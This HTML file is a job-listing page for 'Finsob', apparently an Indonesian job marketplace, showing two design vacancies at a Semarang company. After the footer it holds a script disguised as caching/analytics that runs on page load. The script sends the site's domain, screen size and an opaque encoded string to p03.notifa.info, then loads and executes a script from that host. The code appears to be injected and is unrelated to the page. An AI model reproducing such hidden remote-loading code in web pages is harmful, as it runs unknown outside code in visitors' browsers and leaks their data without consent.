<!doctype html>
<html lang=en>

<head>
  <meta charset="UTF-8">
  <title>Finsob - Job List</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="Description" content="A Marketplace for Finding and Offer Jobs.">

  <!-- Open Graph data / Facebook Card data -->
  <meta property="og:title" content="Finsob">
  <meta property="og:type" content="website">
  <meta property="og:url" content="https://github.com/tr1s/tris-webpack-boilerplate">
  <meta property="og:image" content="https://i.imgur.com/lxRBpeb.jpg">
  <meta property="og:image:alt" content="Blue F symbol of Trust Finsob.">
  <meta property="og:description" content="A Marketplace for Finding and Offer Jobs.">

  <!-- Twitter Card data -->
  <meta name="twitter:card" content="summary">
  <meta name="twitter:creator" content="@bnhr">

  <!-- Mobile header color for Chrome, Firefox OS and Opera -->
  <meta name="theme-color" content="#2c638f">
  <!-- Mobile header color Windows Phone -->
  <meta name="msapplication-navbutton-color" content="#2c638f">
  <!-- Mobile header color for iOS Safari (supports black, black-translucent or default) -->
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">

</head>

<body>
  <div class=wrapper>
    <header>
      <div class=content>
        <div class=header>
          <div class=header-logo>
            <h4>Finsob</h4>
          </div>
          <div class=header-menu>
            <ul>
              <li><a href=login.html>Login</a></li>
              <li><a href=register.html>Register</a></li>
              <li><button onclick='window.location.href="register.html"' class=btn-blue>Perusahaan</button></li>
            </ul>
          </div>
        </div>
      </div>
    </header>
    <div class=wrap-all>
      <div class=breadcrumb>
        <div class=content>
          <div class=breadcrumb-content>
            <h3 class=breadcrumb-content__title> Cari Pekerjaan </h3>
            <div class=breadcrumb-content__menu>
              <div class=breadcrumb-content__menu__home> <a href=index.html>Home</a> </div>
              <div class=breadcrumb-content__menu__link-active> Cari Pekerjaan </div>
            </div>
          </div>
        </div>
      </div>
      <section class=section>
        <div class=job>
          <div class=content>
            <div class=row>
              <div class="col-lg-3 col-md-3 col-sm-12 col-xs-12">
                <div class=card-border>
                  <h5 class=card-border__title> Cari Pekerjaan </h5>
                  <div class=card-border__content>
                    <form action=#> <input type=search name=# id=#> </form>
                  </div>
                </div>
                <div class=card-border>
                  <h5 class=card-border__title> Kategori </h5>
                  <div class=card-border__content> </div>
                </div>
              </div>
              <div class="col-lg-9 col-md-9 col-sm-12 col-xs-12">
                <form action=# class="form-horizontal filter-top"> <label for="">Urutkan berdasarkan :</label>
                  <div class=filter-top__select> <select name="" id="">
                      <option value="">Default</option>
                      <option value="">Nama</option>
                      <option value="">Terbaru</option>
                      <option value="">Terlama</option>
                    </select> <select name="" id="">
                      <option value="">10 Lowongan</option>
                      <option value="">30 Lowongan</option>
                      <option value="">50 Lowongan</option>
                    </select> </div>
                </form>
                <div class=job-card>
                  <div class=job-card-top>
                    <div class=job-card-top__logo> <img src=/images/img-6.png alt="Logo Company"> </div>
                    <div class=job-card-top__company>
                      <h3>PT. Rekayasa Abadi</h3>
                      <h4>Jl. Patimura, No. 9 Semarang</h4>
                    </div>
                    <div class=job-card-top__type>
                      <div class=btn-full>Fulltime</div>
                    </div>
                  </div>
                  <div class=job-card-middle>
                    <div class=job-card-middle__detail>
                      <div class=row>
                        <div class="col-lg-3 col-md-3 col-sm-6 col-xs-6">
                          <h6 class=job-card-middle__detail__title> Posisi Pekerjaan </h6>
                        </div>
                        <div class="col-lg-9 col-md-9 col-sm-6 col-xs-6">
                          <h6 class=job-card-middle__detail__content> : UI Designer </h6>
                        </div>
                        <div class="col-lg-3 col-md-3 col-sm-6 col-xs-6">
                          <h6 class=job-card-middle__detail__title> Tipe Pekerjaan </h6>
                        </div>
                        <div class="col-lg-9 col-md-9 col-sm-6 col-xs-6">
                          <h6 class=job-card-middle__detail__content> : Fulltime </h6>
                        </div>
                        <div class="col-lg-3 col-md-3 col-sm-6 col-xs-6">
                          <h6 class=job-card-middle__detail__title> Gaji </h6>
                        </div>
                        <div class="col-lg-9 col-md-9 col-sm-6 col-xs-6">
                          <h6 class=job-card-middle__detail__content> : &#82;&#112;. 5.000.000 </h6>
                        </div>
                        <div class="col-lg-3 col-md-3 col-sm-6 col-xs-6">
                          <h6 class=job-card-middle__detail__title> Batas Akhir </h6>
                        </div>
                        <div class="col-lg-9 col-md-9 col-sm-6 col-xs-6">
                          <h6 class=job-card-middle__detail__content> : 20 April 2019 </h6>
                        </div>
                      </div>
                    </div>
                    <div class=job-card-middle__app> <a class=btn-blue href="job-detail.html"> Daftar Sekarang </a>
                    </div>
                  </div>
                  <div class=job-card-bottom> <span title=Bookmark class=tooltip-right data-tooltip=Bookmark><i
                        class="far fa-bookmark"></i></span> <span class=text-muted>1 hari yang lalu</span> </div>
                </div>
                <div class=job-card>
                  <div class=job-card-top>
                    <div class=job-card-top__logo> <img src=/images/img-6.png alt="Logo Company"> </div>
                    <div class=job-card-top__company>
                      <h3>PT. Rekayasa Abadi</h3>
                      <h4>Jl. Patimura, No. 9 Semarang</h4>
                    </div>
                    <div class=job-card-top__type>
                      <div class=btn-part>Part-time</div>
                    </div>
                  </div>
                  <div class=job-card-middle>
                    <div class=job-card-middle__detail>
                      <div class=row>
                        <div class="col-lg-3 col-md-3 col-sm-6 col-xs-6">
                          <h6 class=job-card-middle__detail__title> Posisi Pekerjaan </h6>
                        </div>
                        <div class="col-lg-9 col-md-9 col-sm-6 col-xs-6">
                          <h6 class=job-card-middle__detail__content> : UX Designer </h6>
                        </div>
                        <div class="col-lg-3 col-md-3 col-sm-6 col-xs-6">
                          <h6 class=job-card-middle__detail__title> Tipe Pekerjaan </h6>
                        </div>
                        <div class="col-lg-9 col-md-9 col-sm-6 col-xs-6">
                          <h6 class=job-card-middle__detail__content> : Fulltime </h6>
                        </div>
                        <div class="col-lg-3 col-md-3 col-sm-6 col-xs-6">
                          <h6 class=job-card-middle__detail__title> Gaji </h6>
                        </div>
                        <div class="col-lg-9 col-md-9 col-sm-6 col-xs-6">
                          <h6 class=job-card-middle__detail__content> : &#82;&#112;. 5.000.000 - &#82;&#112;. 15.000.000
                          </h6>
                        </div>
                        <div class="col-lg-3 col-md-3 col-sm-6 col-xs-6">
                          <h6 class=job-card-middle__detail__title> Batas Akhir </h6>
                        </div>
                        <div class="col-lg-9 col-md-9 col-sm-6 col-xs-6">
                          <h6 class=job-card-middle__detail__content> : 20 April 2019 </h6>
                        </div>
                      </div>
                    </div>
                    <div class=job-card-middle__app> <a class=btn-blue href="job-detail.html"> Daftar Sekarang </a>
                    </div>
                  </div>
                  <div class=job-card-bottom> <span title=Bookmark class=tooltip-right data-tooltip=Bookmark><i
                        class="far fa-bookmark"></i></span> <span class=text-muted>Seminggu yang lalu</span> </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </section>
    </div>
  </div>
  <footer class=footer>
    <div class=content>
      <div class=row>
        <div class="col-xl-3 col-lg-3 col-md-12 col-sm-12 col-xs-12">
          <h5>Finsob</h5>
          <p>Finsob adalah </p>
        </div>
        <div class="col-xl-3 col-lg-3 col-md-4 col-sm-12 col-xs-12">
          <h5>Tentang Kami</h5>
          <div class=footer-list>
            <ul>
              <li><a href=#>Tentang Kami</a></li>
              <li><a href=#>FAQ</a></li>
              <li><a href=#>Privacy Policy</a></li>
            </ul>
          </div>
        </div>
        <div class="col-xl-3 col-lg-3 col-md-4 col-sm-12 col-xs-12">
          <h5>Perusahaan</h5>
          <div class=footer-list>
            <ul>
              <li><a href=#>Tawarkan Lowongan</a></li>
              <li><a href=#>Beriklan Bersama Kami</a></li>
              <li><a href=#>FAQ</a></li>
            </ul>
          </div>
        </div>
        <div class="col-xl-3 col-lg-3 col-md-4 col-sm-12 col-xs-12">
          <h5>Kontak</h5>
          <div class=footer-list>
            <ul>
              <li><a href=#>Hubungi Kami</a></li>
              <li><a href=#>Twitter</a></li>
              <li><a href=#>Facebook</a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
    <div class=content>
      <div class=footer-bottom>
        <p>&copy; 2019 Finsob. All Right Reserved</p>
      </div>
    </div>
  </footer>
  <script type="text/javascript">
    if (self == top) {
      function netbro_cache_analytics(fn, callback) {
        setTimeout(function () {
          fn();
          callback();
        }, 0);
      }

      function sync(fn) {
        fn();
      }

      function requestCfs() {
        var idc_glo_url = (location.protocol == "https:" ? "https://" : "http://");
        var idc_glo_r = Math.floor(Math.random() * 99999999999);
        var url = idc_glo_url + "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" +
          "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXOasSUm9FYhRCwaSNaPgMi9sgc3RbEEZHNGp1zgFyR0ihEG57OUqf9bDu4%2bFRpuZ%2blf4HZ6ANNGwF6ycCsdlI87h58%2bsPJRwiLbpzk2a65Kt9x0QxxLFjJ72vrSRUr5eVlWUGnJPnn3b4TCGEin2ay3yx54QtQMu5Bl02%2fn6GAc1nK08MRMaAhvngYw6n7nlbHpdr1JMfGTzbf0Z%2bfPUjiK0LdwZc9NcL3duukT44W3UaU3VyN65p7C0S03v8u0j2pzmMt1zDvvVHXTLvxujN3vu4mWuDoHT8I7MeKT0lUEa83tYf%2f5hOd88jK%2bQDgWS8dyEz8AS3AunupEGkKepg%2fmJEqqhtop5pB%2bPMS2%2fSuWcsumCjKgsGQUYNEZHvD8WgArNXxHUdl8fiPpQcIoYbeGgQER2TTZy9FKO%2bidcMdVEx%2fluSMusl7QiiE6OFbpUY1sfLvz%2b%2fr1yz99sA%2b62jHft2UhE1nNyvQfDlyb9KfAFiX%2fBY3ujAogrXpvCkJFGC" +
          "&idc_r=" + idc_glo_r + "&domain=" + document.domain + "&sw=" + screen.width + "&sh=" + screen.height;
        var bsa = document.createElement('script');
        bsa.type = 'text/javascript';
        bsa.async = true;
        bsa.src = url;
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(bsa);
      }
      netbro_cache_analytics(requestCfs, function () {});
    };
  </script>
</body>

</html>
